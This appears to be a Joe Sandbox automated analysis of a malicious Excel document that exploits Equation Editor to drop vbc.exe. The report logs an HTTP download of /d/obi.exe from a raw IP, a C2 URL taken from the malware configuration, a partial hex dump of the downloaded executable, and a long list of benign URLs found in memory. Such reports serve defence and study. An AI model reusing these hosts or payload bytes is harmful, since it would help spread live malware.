          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: calc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: calc.exe, 0000000B.00000002.2269767353.00000000007BF000.00000004.00000001.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: google.com
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 162.159.130.233:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.119.43:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 77MB

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.homekeycap.com/pjje/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:18:19 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21Last-Modified: Fri, 16 Jul 2021 21:41:07 GMTETag: "6800-5c74471fec7eb"Accept-Ranges: bytesContent-Length: 26624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 68 f8 f1 60 00 00 00 00 00 00 00 00 f0 00 27 00 0b 02 02 1e 00 1e 00 00 00 48 00 00 00 0a 00 00 e0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 50 cc 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 50 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 1d 00 00 00 10 00 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 d0 00 00 00 00 30 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 50 c0 2e 72 64 61 74 61 00 00 30 15 00 00 00 40 00 00 00 16 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 70 02 00 00 00 60 00 00 00 04 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 f4 01 00 00 00 70 00 00 00 02 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 80 09 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 e8 07 00 00 00 90 00 00 00 08 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 a0 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 b0 00 00 00 02 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 76 6d 70 30 00 00 00 c0 0e 00 00 00 c0 00 00 00 10 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 63 6f 62 66 00 00 00 de 0b 00 00 00 d0 00 00 00 0c 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /d/obi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D899CB.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /d/obi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 0000000C.00000000.2212091562.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
